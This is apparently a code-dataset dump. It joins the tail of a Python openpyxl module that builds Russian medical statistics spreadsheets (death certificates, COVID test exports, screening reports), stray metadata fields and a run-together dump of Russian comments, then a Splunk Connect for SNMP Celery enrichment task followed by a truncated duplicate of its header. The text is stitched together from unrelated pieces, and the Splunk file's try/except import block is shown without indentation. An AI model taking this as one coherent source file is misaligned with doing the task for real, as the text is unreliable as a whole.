        ws1.cell(row=r, column=3).value = type_doc_death
        ws1.cell(row=r, column=4).value = i["hosp_title"]
        mo_attachment, mo_district = "-", "-"
        if i.get("Прикрепление", None):
            # "Прикрепление" is "<TFOMS code> — <district>".
            attachment_data = i.get("Прикрепление").split("—")
            mo_attachment = HOSPITAL_TITLE_BY_CODE_TFOMS.get(attachment_data[0].strip(), attachment_data[0].strip())
            mo_district = attachment_data[1]
        ws1.cell(row=r, column=5).value = mo_attachment
        ws1.cell(row=r, column=6).value = mo_district
        ws1.cell(row=r, column=7).value = normalize_dash_date(i["Дата смерти"])
        ws1.cell(row=r, column=8).value = i["Дата рождения"]
        ws1.cell(row=r, column=9).value = i["fio_patient"]
        ws1.cell(row=r, column=10).value = i["sex"]
        d1 = du_parse(i["Дата смерти"])
        try:
            # Age at death in whole years; "-" if the birth date is unparsable.
            d2 = du_parse(i["Дата рождения"])
            delta = relativedelta(d1, d2)
            ws1.cell(row=r, column=11).value = delta.years
        except:
            ws1.cell(row=r, column=11).value = "-"
        # (а) disease or condition directly leading to death
        diag_data = get_table_diagnos(i, "а) Болезнь или состояние, непосредственно приведшее к смерти")
        ws1.cell(row=r, column=12).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=13).value = diag_data[0]
        ws1.cell(row=r, column=14).value = diag_data[1]["code"]
        # (б) pathological condition that caused (а)
        diag_data = get_table_diagnos(i, "б) патологическое состояние, которое привело к возникновению вышеуказанной причины:")
        ws1.cell(row=r, column=15).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=16).value = diag_data[0]
        ws1.cell(row=r, column=17).value = diag_data[1]["code"]
        # (в) underlying (original) cause of death
        diag_data = get_table_diagnos(i, "в) первоначальная причина смерти:")
        ws1.cell(row=r, column=18).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=19).value = diag_data[0]
        ws1.cell(row=r, column=20).value = diag_data[1]["code"]
        # (г) external cause for injuries/poisonings
        diag_data = get_table_diagnos(i, "г) внешняя причина при травмах и отравлениях:")
        ws1.cell(row=r, column=21).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]}'
        ws1.cell(row=r, column=22).value = diag_data[0]
        ws1.cell(row=r, column=23).value = diag_data[1]["code"]
        diag_data = get_table_diagnos(i, "II. Прочие важные состояния, способствовавшие смерти, но не связанные с болезнью или патологическим состоянием, приведшим к ней")
        ws1.cell(row=r, column=24).value = f'{diag_data[1]["code"]} {diag_data[1]["title"]} {diag_data[0]}'
        ws1.cell(row=r, column=25).value = ""
        # "Место смерти" may be a JSON string (then its "address" key is used)
        # or already a dict; fall back to "-" otherwise.
        place_death_details = ""
        try:
            place_death_details = json.loads(i["Место смерти"])
            is_dict = True
            if is_dict:
                place_death_details = place_death_details.get("address", "-")
        except:
            is_dict = False
        if not is_dict:
            try:
                place_death_details = i["Место смерти"].get("address", None)
                is_dict = True
            except:
                is_dict = False
        if not is_dict:
            place_death_details = "-"
        ws1.cell(row=r, column=26).value = place_death_details
        # Hospital (stationary) name
        ws1.cell(row=r, column=27).value = i.get("МО", "")
        # Road-accident flag
        ws1.cell(row=r, column=28).value = i["ДТП"]
        ws1.cell(row=r, column=29).value = i["Беременность"]
        if i.get("Заполнил", None):
            who_write = i.get("Заполнил")
        else:
            who_write = ""
        ws1.cell(row=r, column=30).value = who_write
        try:
            type_where_death = i["Типы мест наступления смерти"]["title"]
        except:
            type_where_death = "-"
        ws1.cell(row=r, column=31).value = type_where_death
        ws1.cell(row=r, column=32).value = i["hosp_okpo"]
        ws1.cell(row=r, column=33).value = i["hosp_okato"]
        # Apply the thin-border style to the whole written row (A..AG).
        rows = ws1[f'A{r}:AG{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_reserved_research_death_data(ws1, researches):
    """Fill the reserved death-certificate sheet: one row per reserved number.

    Rows start at 5; records without a "Номер" still advance the row counter
    but are left blank. A falsy record terminates processing.
    """
    cell_style = NamedStyle(name="style_border_res_rz")
    thin = Side(style='thin', color="000000")
    cell_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    cell_style.font = Font(bold=False, size=11)
    cell_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    row_num = 4
    for record in researches:
        if not record:
            return ws1
        row_num += 1
        if not record.get("Номер", ""):
            continue
        values = (
            record.get("hosp_title", ""),
            record.get("Номер", ""),
            record.get("date_create", ""),
            record.get("fio_patient", ""),
            record.get("napravleniye_id", ""),
        )
        for col, value in enumerate(values, 1):
            ws1.cell(row=row_num, column=col).value = value
        for excel_row in ws1[f'A{row_num}:E{row_num}']:
            for cell in excel_row:
                cell.style = cell_style
    return ws1
def statistic_research_by_covid_base(ws1, d1, d2, research_titile):
    """Build the header (row 1) of the COVID research export sheet.

    Unlike the other *_base builders, this one writes no period caption — only
    the 40 column headers with widths and the bold bordered style.

    :param ws1: openpyxl worksheet to fill
    :param d1: period start date (unused here; kept for a uniform signature)
    :param d2: period end date (unused here; kept for a uniform signature)
    :param research_titile: service title (unused here; kept for uniformity)
    :return: the same worksheet with the header populated
    """
    style_border = NamedStyle(name="style_border")
    bd = Side(style='thin', color="000000")
    style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border.font = Font(bold=True, size=11)
    style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    # (caption, column width) pairs in upload-format order.
    columns = [
        ("№ заказа", 23),
        ("Название организации", 33),
        ("ОГРН организации", 33),
        ("Дата заказа", 23),
        ("Код услуги", 33),
        ("Название услуги", 33),
        ("Тест-система", 13),
        ("Дата взятия биоматериала", 13),
        ("Дата готовности результата", 13),
        ("Результат", 13),
        ("Тип исследования", 13),
        ("Значение результата", 33),
        ("Фамилия", 33),
        ("Имя", 33),
        ("Отчество", 33),
        ("Пол", 8),
        ("Дата рождения", 13),
        ("Телефон", 13),
        ("e-mail", 13),
        ("Тип ДУЛ", 13),
        ("Номер документа", 13),
        ("Серия документа", 13),
        ("СНИЛС", 23),
        ("ОМС", 23),
        ("Адрес регистрации регион", 23),
        ("Адрес регистрации район", 23),
        ("Адрес регистрации город", 23),
        ("Адрес регистрации улица", 23),
        ("Адрес регистрации дом", 23),
        ("Адрес регистрации строение", 23),
        ("Адрес регистрации квартира", 23),
        ("Адрес факт регион", 23),
        ("Адрес факт район", 23),
        ("Адрес факт город", 23),
        ("Адрес факт улица", 23),
        ("Адрес факт дом", 23),
        ("Адрес факт строение", 23),
        ("Адрес факт квартира", 23),
        ("Название лаборатории", 23),
        ("ОГРН лаборатории", 23),
    ]
    for idx, column in enumerate(columns, 1):
        ws1.cell(row=1, column=idx).value = column[0]
        ws1.column_dimensions[get_column_letter(idx)].width = column[1]
        ws1.cell(row=1, column=idx).style = style_border
    return ws1
def statistic_research_by_covid_data(ws1, result_patient, patient_docs):
    """Fill the COVID research export sheet: one row per patient result.

    Rows start at 2 (the header occupies row 1). For non-ELISA ("ИФА") methods
    the result is encoded as 0/1 in the "Результат" column; for ELISA the raw
    value goes to "Значение результата" instead.

    :param ws1: openpyxl worksheet prepared by statistic_research_by_covid_base
    :param result_patient: iterable of result records (attribute access)
    :param patient_docs: dict client_id -> list of {doc kind: value} dicts
    :return: the filled worksheet
    """
    style_border_res = NamedStyle(name="style_border_res")
    bd = Side(style='thin', color="000000")
    style_border_res.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border_res.font = Font(bold=False, size=11)
    style_border_res.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    r = 1
    if not result_patient:
        return ws1
    for i in result_patient:
        r += 1
        ws1.cell(row=r, column=1).value = i.dir_id
        ws1.cell(row=r, column=2).value = i.hosp_title
        ws1.cell(row=r, column=3).value = i.hosp_ogrn
        ws1.cell(row=r, column=4).value = i.date_create
        ws1.cell(row=r, column=5).value = i.research_code
        ws1.cell(row=r, column=6).value = i.research_title
        ws1.cell(row=r, column=7).value = ""
        ws1.cell(row=r, column=8).value = i.date_reciev
        ws1.cell(row=r, column=9).value = i.date_confirm
        if i.value and i.method_title != "ИФА":
            # PCR-style result: negative -> 0, anything else -> 1.
            val_param = 0 if 'отриц' in i.value.lower() else 1
            result_val = ""
        else:
            result_val = i.value
            val_param = ""
        ws1.cell(row=r, column=10).value = val_param
        # Research type: 2 = ELISA ("ИФА"), 1 = everything else.
        method_val = 2 if i.method_title == "ИФА" else 1
        ws1.cell(row=r, column=11).value = method_val
        ws1.cell(row=r, column=12).value = result_val
        ws1.cell(row=r, column=13).value = i.family
        ws1.cell(row=r, column=14).value = i.name
        ws1.cell(row=r, column=15).value = i.patronymic
        ws1.cell(row=r, column=16).value = 1 if i.sex.lower() == "м" else 2
        ws1.cell(row=r, column=17).value = i.born
        ws1.cell(row=r, column=18).value = ""
        ws1.cell(row=r, column=19).value = ""
        patient_doc = patient_docs.get(i.client_id, None)
        # FIX: renamed local `type` -> `doc_type`; it shadowed the builtin.
        doc_type, serial, number, snils, polis = "", "", "", "", ""
        if patient_doc:
            for pat_doc in patient_doc:
                for k, v in pat_doc.items():
                    if k == "снилс":
                        snils = v
                    elif k == "полис":
                        polis = v
                    elif "паспорт" in k.lower() or "рождение" in k.lower():
                        k_value = "Паспорт гражданина РФ" if "паспорт" in k.lower() else k
                        doc_type = k_value
                        # Identity documents are stored as "serial@number".
                        data = v.split("@")
                        serial = data[0]
                        number = data[1]
        ws1.cell(row=r, column=20).value = doc_type
        ws1.cell(row=r, column=21).value = number
        ws1.cell(row=r, column=22).value = serial
        ws1.cell(row=r, column=23).value = snils
        ws1.cell(row=r, column=24).value = polis
        ws1.cell(row=r, column=25).value = "Иркутская область"
        ws1.cell(row=r, column=39).value = i.hosp_title
        ws1.cell(row=r, column=40).value = i.hosp_ogrn
        # NOTE(review): only columns A..C are styled although 40 columns are
        # written — looks intentional (matches original), but confirm.
        rows = ws1[f'A{r}:C{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_research_by_sum_lab_base(ws1, d1, d2, research_titile):
    """Build the header (rows 1-4) of the per-laboratory totals sheet.

    :param ws1: openpyxl worksheet to fill
    :param d1: period start date (already formatted for display)
    :param d2: period end date (already formatted for display)
    :param research_titile: report title shown in the header
    :return: the same worksheet with the header populated (previously this
        builder returned None, unlike every sibling *_base builder)
    """
    style_border = NamedStyle(name="style_border")
    bd = Side(style='thin', color="000000")
    style_border.border = Border(left=bd, top=bd, right=bd, bottom=bd)
    style_border.font = Font(bold=True, size=11)
    style_border.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    columns = [
        ('Лаборатория', 33),
        ('Услуга', 55),
        ('Кол-во', 25),
    ]
    for idx, column in enumerate(columns, 1):
        ws1.cell(row=4, column=idx).value = column[0]
        ws1.column_dimensions[get_column_letter(idx)].width = column[1]
        ws1.cell(row=4, column=idx).style = style_border
    # FIX: return the worksheet for consistency with the other *_base helpers.
    return ws1
def statistic_research_by_sum_lab_data(ws1, researches):
    """Write per-laboratory research totals, one row per record, from row 5."""
    result_style = NamedStyle(name="style_border_res")
    thin = Side(style='thin', color="000000")
    result_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    result_style.font = Font(bold=False, size=11)
    result_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    if not researches:
        return ws1
    row_num = 4
    for record in researches:
        row_num += 1
        values = (record.lab_title, record.research_title, record.sum_research_id)
        for col, value in enumerate(values, 1):
            ws1.cell(row=row_num, column=col).value = value
        for excel_row in ws1[f'A{row_num}:C{row_num}']:
            for cell in excel_row:
                cell.style = result_style
    return ws1
def statistic_research_by_details_lab_base(ws1, d1, d2, research_titile):
    """Build the header (rows 1-4) of the per-research lab details sheet."""
    header_style = NamedStyle(name="style_border")
    thin = Side(style='thin', color="000000")
    header_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    header_style.font = Font(bold=True, size=11)
    header_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    ws1.cell(row=1, column=2).value = research_titile
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    # (caption, column width) pairs for the header row.
    captions = (
        ('ID', 23),
        ('лаборатория', 15),
        ('анализ', 35),
        ('дата', 15),
        ('время', 15),
        ('аппарат', 15),
        ('дата взятия', 15),
        ('время взятия', 15),
    )
    for col, (title, width) in enumerate(captions, 1):
        ws1.cell(row=4, column=col).value = title
        ws1.column_dimensions[get_column_letter(col)].width = width
        ws1.cell(row=4, column=col).style = header_style
    return ws1
def statistic_research_by_details_lab_data(ws1, researches):
    """Write one row per confirmed research record, starting at row 5.

    Falsy attribute values are rendered as empty strings.
    """
    result_style = NamedStyle(name="style_border_res")
    thin = Side(style='thin', color="000000")
    result_style.border = Border(left=thin, top=thin, right=thin, bottom=thin)
    result_style.font = Font(bold=False, size=11)
    result_style.alignment = Alignment(wrap_text=True, horizontal='center', vertical='center')
    if not researches:
        return ws1
    row_num = 4
    for record in researches:
        row_num += 1
        values = (
            record.napravleniye_id,
            record.lab_title,
            record.research_title,
            record.date_confirm,
            record.time_confirm,
            record.name,
            record.date_tubes,
            record.time_tubes,
        )
        for col, value in enumerate(values, 1):
            ws1.cell(row=row_num, column=col).value = value or ""
        for excel_row in ws1[f'A{row_num}:H{row_num}']:
            for cell in excel_row:
                cell.style = result_style
    return ws1
def statistic_message_ticket_base(ws1, d1, d2, style_border):
    """Build the header (rows 1-4) of the doctor-call tickets sheet.

    Unlike the other *_base builders, the header style is passed in by the
    caller rather than created here.
    """
    ws1.cell(row=1, column=1).value = 'Обращения'
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    captions = (
        ('МО', 20),
        ('Номер', 20),
        ('Создано', 15),
        ('Физ. лицо', 26),
        ('Телефон', 20),
        ('Адрес', 20),
        ('Цель', 20),
        ('Примечания', 26),
        ('Статус', 16),
        ('Источник', 16),
        ('Создатель', 26),
    )
    for col, (title, width) in enumerate(captions, 1):
        ws1.cell(row=4, column=col).value = title
        ws1.column_dimensions[get_column_letter(col)].width = width
        ws1.cell(row=4, column=col).style = style_border
    return ws1
def statistic_message_ticket_data(ws1, message_ticket_sql, style_border_res):
    """Fill the doctor-call tickets sheet: one row per ticket, from row 5.

    :param ws1: openpyxl worksheet prepared by statistic_message_ticket_base
    :param message_ticket_sql: iterable of ticket records (attribute access)
    :param style_border_res: openpyxl style applied to every written row
    :return: the filled worksheet
    """
    r = 4
    purposes = dict(DoctorCall.PURPOSES)
    statuses = dict(DoctorCall.STATUS)
    for ticket in message_ticket_sql:
        r += 1
        ws1.cell(row=r, column=1).value = ticket.hospital_short_title or ticket.hospital_title
        ws1.cell(row=r, column=2).value = ticket.external_num or ticket.num
        ws1.cell(row=r, column=3).value = ticket.date_create
        ws1.cell(row=r, column=4).value = f'{ticket.family} {ticket.name} {ticket.patronymic}'
        ws1.cell(row=r, column=5).value = ticket.phone
        ws1.cell(row=r, column=6).value = ticket.address
        ws1.cell(row=r, column=7).value = purposes.get(ticket.purpose, '')
        ws1.cell(row=r, column=8).value = ticket.comment
        ws1.cell(row=r, column=9).value = statuses.get(ticket.status, '')
        # FIX: test the boolean flag directly. Previously this read
        # statuses.get(ticket.is_external) — a lookup of a boolean in the
        # status-code dict — which is falsy for every ticket, so the source
        # column always showed 'оператор'.
        ws1.cell(row=r, column=10).value = 'интернет' if ticket.is_external else 'оператор'
        who_create = ""
        if ticket.fio and ticket.short_title:
            who_create = f"{ticket.fio}-{ticket.short_title}"
        ws1.cell(row=r, column=11).value = who_create
        rows = ws1[f'A{r}:K{r}']
        for row in rows:
            for cell in row:
                cell.style = style_border_res
    return ws1
def statistic_message_purpose_total_data(ws1, message_total, d1, d2, style_border_res):
    """Render the per-purpose doctor-call totals table with a SUM footer row."""
    ws1.cell(row=1, column=1).value = 'Обращения'
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=3, column=1).value = f'c {d1} по {d2}'
    headers = (('Цель', 20), ('Всего', 20), ('Выполнено', 20))
    for col, (title, width) in enumerate(headers, 1):
        ws1.cell(row=5, column=col).value = title
        ws1.column_dimensions[get_column_letter(col)].width = width
        ws1.cell(row=5, column=col).style = style_border_res
    purposes = dict(DoctorCall.PURPOSES)
    first_row = 5
    row_num = 5
    for record in message_total:
        row_num += 1
        ws1.cell(row=row_num, column=1).value = purposes.get(record.total_purpose, '')
        ws1.cell(row=row_num, column=2).value = record.sum_total_purpose
        ws1.cell(row=row_num, column=3).value = record.sum_execute_purpose or ''
        for excel_row in ws1[f'A{row_num}:C{row_num}']:
            for cell in excel_row:
                cell.style = style_border_res
    # Footer: Excel SUM formulas over the data rows just written.
    total_row = row_num + 1
    ws1.cell(row=total_row, column=1).value = 'Итого'
    ws1.cell(row=total_row, column=1).style = style_border_res
    ws1.cell(row=total_row, column=2).value = f'=SUM(B{first_row + 1}:B{row_num})'
    ws1.cell(row=total_row, column=2).style = style_border_res
    ws1.cell(row=total_row, column=3).value = f'=SUM(C{first_row + 1}:C{row_num})'
    ws1.cell(row=total_row, column=3).style = style_border_res
    return ws1
def statistic_screening_month_data(ws1, data, month, year, style_border_res):
    """Render the monthly cervical-screening summary (header + one data row).

    :param ws1: openpyxl worksheet to fill
    :param data: dict of metric name -> value for the month
    :param month: month number (1-12), resolved to a name via month_dict
    :param year: report year
    :param style_border_res: openpyxl style applied to every written cell
    :return: the filled worksheet
    """
    ws1.cell(row=1, column=1).value = 'Скрининг'
    ws1.cell(row=2, column=1).value = 'Период:'
    ws1.cell(row=2, column=2).value = f'{month_dict[int(month)]}-{year}'
    size = 12
    columns = [
        ('Месяц', 10),
        ('Число женщин 18-69 лет, проживающих на прикрепленной территории', size),
        ('Число женщин 30 -65 лет, подлежащих скринингу (всего)', size),
        ('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
        ('Число женщин 30-65 лет, прошедших скрининг', size),
        ('Число женщин 30 -65 лет, подлежащих скринингу при диспансеризации', size),
        ('Число женщин, которым выполнен ПАП-тест от общего числа прошедших скрининг', size),
        ('Число женщин, по препаратам которых получили цитологический результат', size),
        ('Из них, препараты признаны адекватными', size),
        ('Недостаточно адекватными', size),
        ('Не адекватными', size),
        ('Из числа женщин с недостаточно адекватным, неадекватным результатом, число вызванных женщин, у которых повторно взят материал на цитологическое исследование', size),
        ('В т.ч. АSCUS', size),
        ('В т.ч. легкое интраэпителиальное поражение CIN I, признаки ВПЧ', size),
        ('Умеренное интраэпителиальное поражение CIN I-II, II', size),
        ('Тяжелое интраэпителиальное поражение CIN II-III, III', size),
        ('cr in situ', size),
        ('Подозрение на ЗНО шейки матки', size),
        ('Всего по Папа-Николау', size),
    ]
    for idx, column in enumerate(columns, 1):
        ws1.cell(row=5, column=idx).value = column[0]
        ws1.column_dimensions[get_column_letter(idx)].width = column[1]
        ws1.cell(row=5, column=idx).style = style_border_res
    ws1.cell(row=6, column=1).value = f'{month_dict[int(month)]}'
    ws1.cell(row=6, column=1).style = style_border_res
    # Map each metric key to its destination column; replaces the former
    # 16-branch if-chain. Columns 8 and 18 are intentionally left unfilled,
    # matching the original report layout.
    key_to_column = {
        "attached_count_age_for_month": 2,
        "count_regplan_for_month": 3,
        "count_dispensarization_from_screening": 4,
        "pass_screening": 5,
        "pass_screening_in_dispensarization": 6,
        "pass_pap_analysis": 7,
        "pass_pap_adequate_result_value": 9,
        "pass_pap_not_enough_adequate_result_value": 10,
        "pass_pap_not_adequate_result_value": 11,
        "count_people_dublicate": 12,
        "pass_pap_ascus_result_value": 13,
        "pass_pap_cin_i_result_value": 14,
        "pass_pap_cin_i_ii_result_value": 15,
        "pass_pap_cin_ii_iii_result_value": 16,
        "pass_pap_cr_in_situ_result_value": 17,
        "count_pap_analysys": 19,
    }
    for k, v in data.items():
        col = key_to_column.get(k)
        if col is not None:
            ws1.cell(row=6, column=col).value = v
            ws1.cell(row=6, column=col).style = style_border_res
    return ws1
def get_table_diagnos(diagnos_data, item):
    """Extract the (period, diagnosis) pair for one death-certificate cause line.

    ``diagnos_data[item]`` is either a dict or a JSON string of the form
    ``{"rows": [[period_value, period_unit, diagnosis_json, ...], ...]}`` where
    ``diagnosis_json`` decodes to ``{"code": ..., "title": ...}``.

    :param diagnos_data: per-certificate record
    :param item: key of the cause line to extract
    :return: tuple ``(period_string, {"code": ..., "title": ...})``; both parts
        degrade to "-" placeholders when the data is missing or malformed
    """
    try:
        # A dict value is used as-is; .keys() probes for dict-ness.
        diagnos_data[item].keys()
        diag_data = diagnos_data[item]
    except AttributeError:
        # Plain JSON string variant.
        diag_data = json.loads(diagnos_data[item])
    try:
        diag_details = json.loads(diag_data["rows"][0][2])
        period_data = f'{diag_data["rows"][0][0]} {diag_data["rows"][0][1]}'
    except Exception:
        # FIX: was a bare except (also swallowed KeyboardInterrupt/SystemExit).
        # Missing/malformed rows degrade to placeholders.
        diag_details = {"code": "-", "title": "-"}
        period_data = "-"
    return (period_data, diag_details)
|
ru
| 0.285321
|
Основа(каркас) для итоговых данных :return: Заговловки видов работ :param ws1: :param titles: :return: :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек :param ws1: :return: # габариты ячеек # ws1.row_dimensions[2].height = 85 Назначить ширину колонок. Вход worksheet выход worksheen с размерами Заголовки данных # Закголовки столбцов # i_obj - обеъект доктор # one_days = timedelta(1) # Порядок колонок в issled: # title, code, is_first_reception, polis_n, polis_who_give, \ # first_time, napravleniye_id, doc_confirmation_id, def_uet, co_executor_id, \ # co_executor_uet, co_executor2_id, co_executor2_uet, datetime_confirm, date_confirm, \ # time_confirm, maybe_onco, purpose, diagnos, iss_result, \ # outcome, card_number, client_family, client_name, client_patronymic, \ # birthday # current_datetime_confirm = issled[13] # current_count = 1 # current_price = '' res - результат выборки SQL порядок возврата: napr, date_confirm, time_confirm, create_date_napr, create_time_napr, doc_fio, coast, discount, how_many, ((coast + (coast/100 * discount)) * how_many)::NUMERIC(10,2) AS sum_money, ist_f, time_confirmation, num_card, ind_family, ind_name, patronymic, birthday, date_born, to_char(EXTRACT(YEAR from age(time_confirmation, date_born)), '999') as ind_age :return: :return: # а) # б) # в) # г) # Название стационара # ДТП :return: # а) # б) # в) # г) # Название стационара # ДТП :return: :return: :return: :return:
| 2.084481
| 2
|
splunk_connect_for_snmp/enrich/tasks.py
|
melord/splunk-connect-for-snmp
| 0
|
6628079
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from splunk_connect_for_snmp import customtaskmanager
try:
from dotenv import load_dotenv
load_dotenv()
except:
pass
import os
from hashlib import shake_128
import pymongo
from celery import Task, shared_task
from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
# State-store connection settings; MONGO_DB defaults to "sc4snmp".
MONGO_URI = os.getenv("MONGO_URI")
MONGO_DB = os.getenv("MONGO_DB", "sc4snmp")
# System-level SNMP fields mirrored into the target's "state" document.
TRACKED_F = [
    "SNMPv2-MIB.sysDescr",
    "SNMPv2-MIB.sysObjectID",
    "SNMPv2-MIB.sysContact",
    "SNMPv2-MIB.sysName",
    "SNMPv2-MIB.sysLocation",
]
# Metric used to detect device restarts (a decreasing value means restart).
SYS_UP_TIME = "SNMPv2-MIB.sysUpTime"
# Flush queued Mongo updates once this many are pending.
MONGO_UPDATE_BATCH_THRESHOLD = 20
# Check whether sysUpTime decreased since the last poll; if so the device
# restarted, and a full SNMP walk is scheduled to refresh its state.
def check_restart(current_target, result, targets_collection, address):
    """Detect a device restart via a sysUpTime decrease and react.

    For every metric group carrying sysUpTime: if the stored value for this
    target is larger than the newly polled one, schedule an immediate walk
    task named ``sc4snmp;<address>;walk``; in all cases persist the latest
    sysUpTime into the target's document.

    :param current_target: target document previously loaded from Mongo
        (may lack the "sysUpTime" key on first contact)
    :param result: polled data — mapping of group key to group dict
    :param targets_collection: Mongo collection holding per-target state
    :param address: target address (document key)
    """
    for group_key, group_dict in result.items():
        if "metrics" in group_dict and SYS_UP_TIME in group_dict["metrics"]:
            sysuptime = group_dict["metrics"][SYS_UP_TIME]
            new_value = sysuptime["value"]
            logger.debug(f"current target = {current_target}")
            if "sysUpTime" in current_target:
                old_value = current_target["sysUpTime"]["value"]
                logger.debug(f"new_value = {new_value} old_value = {old_value}")
                # Uptime going backwards => the device rebooted.
                if int(new_value) < int(old_value):
                    task_config = {
                        "name": f"sc4snmp;{address};walk",
                        "run_immediately": True,
                    }
                    logger.info(f"Detected restart of {address}, triggering walk")
                    periodic_obj = customtaskmanager.CustomPeriodicTaskManager()
                    periodic_obj.manage_task(**task_config)
            # Persist the latest observed sysUpTime for the next comparison.
            state = {
                "value": sysuptime["value"],
                "type": sysuptime["type"],
                "oid": sysuptime["oid"],
            }
            targets_collection.update_one(
                {"address": address}, {"$set": {"sysUpTime": state}}, upsert=True
            )
class EnrichTask(Task):
    """Base Celery Task for the enrich task; an extension point with no
    custom per-task state yet."""

    def __init__(self):
        pass
@shared_task(bind=True, base=EnrichTask)
def enrich(self, result):
    """Merge a poll result with persisted per-target state in MongoDB.

    Persists new/changed attribute fields per group, mirrors the tracked
    system fields into the target document (batched every
    MONGO_UPDATE_BATCH_THRESHOLD updates), triggers a restart check, and
    finally folds previously-seen fields back into ``result`` so downstream
    consumers see the full attribute set.

    :param result: dict with "address" and "result" (group key -> group data)
    :return: the enriched ``result`` dict
    """
    address = result["address"]
    mongo_client = pymongo.MongoClient(MONGO_URI)
    # FIX: honor the MONGO_DB setting instead of the hard-coded "sc4snmp"
    # attribute access (MONGO_DB defaults to "sc4snmp", so default behavior
    # is unchanged).
    db = mongo_client[MONGO_DB]
    targets_collection = db.targets
    attributes_collection = db.attributes
    updates = []
    attribute_updates = []
    current_target = targets_collection.find_one(
        {"address": address}, {"target": True, "sysUpTime": True}
    )
    if not current_target:
        logger.info(f"First time for {address}")
        current_target = {"address": address}
    else:
        logger.info(f"Not first time for {address}")
    # TODO: Compare the ts field with the lastmodified time of record and only update if we are newer
    check_restart(current_target, result["result"], targets_collection, address)
    # First write back to DB new/changed data
    for group_key, group_data in result["result"].items():
        # Group keys can exceed Mongo's key limits; use a stable hash as id.
        group_key_hash = shake_128(group_key.encode()).hexdigest(255)
        current_attributes = attributes_collection.find_one(
            {"address": address, "group_key_hash": group_key_hash},
            {"fields": True, "id": True},
        )
        if not current_attributes and group_data["fields"]:
            attributes_collection.update_one(
                {"address": address, "group_key_hash": group_key_hash},
                {"$set": {"id": group_key}},
                upsert=True,
            )
        for field_key, field_value in group_data["fields"].items():
            field_key_hash = shake_128(field_key.encode()).hexdigest(255)
            field_value["name"] = field_key
            cv = None
            if current_attributes and field_key_hash in current_attributes.get(
                "fields", {}
            ):
                cv = current_attributes["fields"][field_key_hash]
            if cv and not cv == field_value:
                # modified value -> persist the new one
                attribute_updates.append(
                    {"$set": {"fields": {field_key_hash: field_value}}}
                )
            elif cv:
                # unchanged -> nothing to write
                pass
            else:
                # new field -> persist
                attribute_updates.append(
                    {"$set": {"fields": {field_key_hash: field_value}}}
                )
            if field_key in TRACKED_F:
                # Mirror system-level fields into the target's state document.
                updates.append(
                    {"$set": {"state": {field_key.replace(".", "|"): field_value}}}
                )
            # Flush batches so a single huge group doesn't build an
            # unbounded update pipeline.
            if len(updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
                targets_collection.update_one(
                    {"address": address}, updates, upsert=True
                )
                updates.clear()
            if len(attribute_updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
                attributes_collection.update_one(
                    {
                        "address": address,
                        "group_key_hash": group_key_hash,
                        "id": group_key,
                    },
                    attribute_updates,
                    upsert=True,
                )
                attribute_updates.clear()
    # Flush any remaining queued updates.
    if updates:
        targets_collection.update_one({"address": address}, updates, upsert=True)
        updates.clear()
    if attribute_updates:
        # NOTE(review): group_key_hash/group_key here refer to the LAST group
        # iterated — matches the original behavior; confirm this is intended.
        attributes_collection.update_one(
            {"address": address, "group_key_hash": group_key_hash, "id": group_key},
            attribute_updates,
            upsert=True,
        )
        attribute_updates.clear()
    # Now add back any fields we have seen before but which are absent from
    # this poll, so downstream consumers always see the full attribute set.
    # NOTE(review): current_attributes is also from the last group only.
    if current_attributes:
        attribute_group_id = current_attributes["id"]
        fields = current_attributes["fields"]
        if attribute_group_id in result["result"]:
            for persist_data in fields.values():
                if (
                    persist_data["name"]
                    not in result["result"][attribute_group_id]["fields"]
                ):
                    result["result"][attribute_group_id]["fields"][
                        persist_data["name"]
                    ] = persist_data
    return result
|
#
# Copyright 2021 Splunk Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from splunk_connect_for_snmp import customtaskmanager
try:
from dotenv import load_dotenv
load_dotenv()
except:
pass
import os
from hashlib import shake_128
import pymongo
from celery import Task, shared_task
